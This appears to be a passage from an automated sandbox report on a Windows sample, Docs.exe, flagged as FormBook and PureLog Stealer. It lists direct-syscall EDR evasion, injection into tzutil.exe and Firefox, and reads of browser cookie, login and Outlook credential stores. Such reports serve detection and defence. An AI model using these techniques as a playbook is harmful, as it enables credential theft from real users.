                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01598B50 mov eax, dword ptr fs:[00000030h]3_2_01598B50
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01636B40 mov eax, dword ptr fs:[00000030h]3_2_01636B40
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01636B40 mov eax, dword ptr fs:[00000030h]3_2_01636B40
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0166AB40 mov eax, dword ptr fs:[00000030h]3_2_0166AB40
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01648B42 mov eax, dword ptr fs:[00000030h]3_2_01648B42
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0159CB7E mov eax, dword ptr fs:[00000030h]3_2_0159CB7E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01654B4B mov eax, dword ptr fs:[00000030h]3_2_01654B4B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01654B4B mov eax, dword ptr fs:[00000030h]3_2_01654B4B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01672B57 mov eax, dword ptr fs:[00000030h]3_2_01672B57
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01672B57 mov eax, dword ptr fs:[00000030h]3_2_01672B57
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01672B57 mov eax, dword ptr fs:[00000030h]3_2_01672B57
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01672B57 mov eax, dword ptr fs:[00000030h]3_2_01672B57
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164EB50 mov eax, dword ptr fs:[00000030h]3_2_0164EB50
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01668B28 mov eax, dword ptr fs:[00000030h]3_2_01668B28
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01668B28 mov eax, dword ptr fs:[00000030h]3_2_01668B28
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01674B00 mov eax, dword ptr fs:[00000030h]3_2_01674B00
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161EB1D mov eax, dword ptr fs:[00000030h]3_2_0161EB1D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161EB1D mov eax, dword ptr fs:[00000030h]3_2_0161EB1D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161EB1D mov eax, dword ptr fs:[00000030h]3_2_0161EB1D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161EB1D mov eax, dword ptr fs:[00000030h]3_2_0161EB1D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161EB1D mov eax, dword ptr fs:[00000030h]3_2_0161EB1D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161EB1D mov eax, dword ptr fs:[00000030h]3_2_0161EB1D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161EB1D mov eax, dword ptr fs:[00000030h]3_2_0161EB1D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161EB1D mov eax, dword ptr fs:[00000030h]3_2_0161EB1D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161EB1D mov eax, dword ptr fs:[00000030h]3_2_0161EB1D
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CEB20 mov eax, dword ptr fs:[00000030h]3_2_015CEB20
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CEB20 mov eax, dword ptr fs:[00000030h]3_2_015CEB20
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162CBF0 mov eax, dword ptr fs:[00000030h]3_2_0162CBF0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C0BCB mov eax, dword ptr fs:[00000030h]3_2_015C0BCB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C0BCB mov eax, dword ptr fs:[00000030h]3_2_015C0BCB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C0BCB mov eax, dword ptr fs:[00000030h]3_2_015C0BCB
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A0BCD mov eax, dword ptr fs:[00000030h]3_2_015A0BCD
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A0BCD mov eax, dword ptr fs:[00000030h]3_2_015A0BCD
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A0BCD mov eax, dword ptr fs:[00000030h]3_2_015A0BCD
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CEBFC mov eax, dword ptr fs:[00000030h]3_2_015CEBFC
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A8BF0 mov eax, dword ptr fs:[00000030h]3_2_015A8BF0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A8BF0 mov eax, dword ptr fs:[00000030h]3_2_015A8BF0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A8BF0 mov eax, dword ptr fs:[00000030h]3_2_015A8BF0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164EBD0 mov eax, dword ptr fs:[00000030h]3_2_0164EBD0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01654BB0 mov eax, dword ptr fs:[00000030h]3_2_01654BB0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_01654BB0 mov eax, dword ptr fs:[00000030h]3_2_01654BB0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0BBE mov eax, dword ptr fs:[00000030h]3_2_015B0BBE
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0BBE mov eax, dword ptr fs:[00000030h]3_2_015B0BBE
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0A5B mov eax, dword ptr fs:[00000030h]3_2_015B0A5B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015B0A5B mov eax, dword ptr fs:[00000030h]3_2_015B0A5B
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0164EA60 mov eax, dword ptr fs:[00000030h]3_2_0164EA60
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A6A50 mov eax, dword ptr fs:[00000030h]3_2_015A6A50
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A6A50 mov eax, dword ptr fs:[00000030h]3_2_015A6A50
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A6A50 mov eax, dword ptr fs:[00000030h]3_2_015A6A50
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A6A50 mov eax, dword ptr fs:[00000030h]3_2_015A6A50
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A6A50 mov eax, dword ptr fs:[00000030h]3_2_015A6A50
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A6A50 mov eax, dword ptr fs:[00000030h]3_2_015A6A50
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A6A50 mov eax, dword ptr fs:[00000030h]3_2_015A6A50
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161CA72 mov eax, dword ptr fs:[00000030h]3_2_0161CA72
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0161CA72 mov eax, dword ptr fs:[00000030h]3_2_0161CA72
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DCA6F mov eax, dword ptr fs:[00000030h]3_2_015DCA6F
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DCA6F mov eax, dword ptr fs:[00000030h]3_2_015DCA6F
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DCA6F mov eax, dword ptr fs:[00000030h]3_2_015DCA6F
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DCA38 mov eax, dword ptr fs:[00000030h]3_2_015DCA38
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C4A35 mov eax, dword ptr fs:[00000030h]3_2_015C4A35
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015C4A35 mov eax, dword ptr fs:[00000030h]3_2_015C4A35
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015CEA2E mov eax, dword ptr fs:[00000030h]3_2_015CEA2E
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_0162CA11 mov eax, dword ptr fs:[00000030h]3_2_0162CA11
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DCA24 mov eax, dword ptr fs:[00000030h]3_2_015DCA24
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015A0AD0 mov eax, dword ptr fs:[00000030h]3_2_015A0AD0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D4AD0 mov eax, dword ptr fs:[00000030h]3_2_015D4AD0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D4AD0 mov eax, dword ptr fs:[00000030h]3_2_015D4AD0
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015F6ACC mov eax, dword ptr fs:[00000030h]3_2_015F6ACC
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015F6ACC mov eax, dword ptr fs:[00000030h]3_2_015F6ACC
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015F6ACC mov eax, dword ptr fs:[00000030h]3_2_015F6ACC
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DAAEE mov eax, dword ptr fs:[00000030h]3_2_015DAAEE
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015DAAEE mov eax, dword ptr fs:[00000030h]3_2_015DAAEE
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015D8A90 mov edx, dword ptr fs:[00000030h]3_2_015D8A90
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AEA80 mov eax, dword ptr fs:[00000030h]3_2_015AEA80
                      Source: C:\Users\user\Desktop\Docs.exeCode function: 3_2_015AEA80 mov eax, dword ptr fs:[00000030h]3_2_015AEA80
                      Source: C:\Users\user\Desktop\Docs.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtQueryValueKey: Direct from: 0x76EF2BECJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtOpenKeyEx: Direct from: 0x76EF3C9CJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtClose: Direct from: 0x76EF2B6C
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: NULL target: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeSection loaded: NULL target: C:\Windows\SysWOW64\tzutil.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\tzutil.exeThread register set: target process: 6672Jump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Windows\SysWOW64\tzutil.exeThread APC queued: target process: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeProcess created: C:\Users\user\Desktop\Docs.exe "C:\Users\user\Desktop\Docs.exe"Jump to behavior
                      Source: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: hrhhgLQrQIpiVv.exe, 00000006.00000000.2520023857.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3289199042.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289194377.0000000001391000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                      Source: hrhhgLQrQIpiVv.exe, 00000006.00000000.2520023857.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3289199042.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289194377.0000000001391000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: hrhhgLQrQIpiVv.exe, 00000006.00000000.2520023857.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3289199042.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289194377.0000000001391000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: hrhhgLQrQIpiVv.exe, 00000006.00000000.2520023857.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000006.00000002.3289199042.0000000001B61000.00000002.00000001.00040000.00000000.sdmp, hrhhgLQrQIpiVv.exe, 00000008.00000002.3289194377.0000000001391000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\Docs.exeQueries volume information: C:\Users\user\Desktop\Docs.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Docs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.Docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Docs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.3289220209.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3289268086.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2597842701.0000000001910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3288549550.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2597967111.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.Docs.exe.3ae24c8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Docs.exe.7030000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Docs.exe.7030000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Docs.exe.2b3dd24.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2064805935.0000000007030000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2061956351.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2061498149.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\tzutil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\tzutil.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.Docs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Docs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.3289220209.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3289268086.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2597842701.0000000001910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3288549550.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.3287823011.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2597967111.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.3289559779.0000000003220000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.Docs.exe.3ae24c8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Docs.exe.7030000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Docs.exe.3ae24c8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Docs.exe.7030000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Docs.exe.2b3dd24.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2064805935.0000000007030000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2061956351.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2061498149.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading                      		312
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism                      		1
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop Protocol11
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
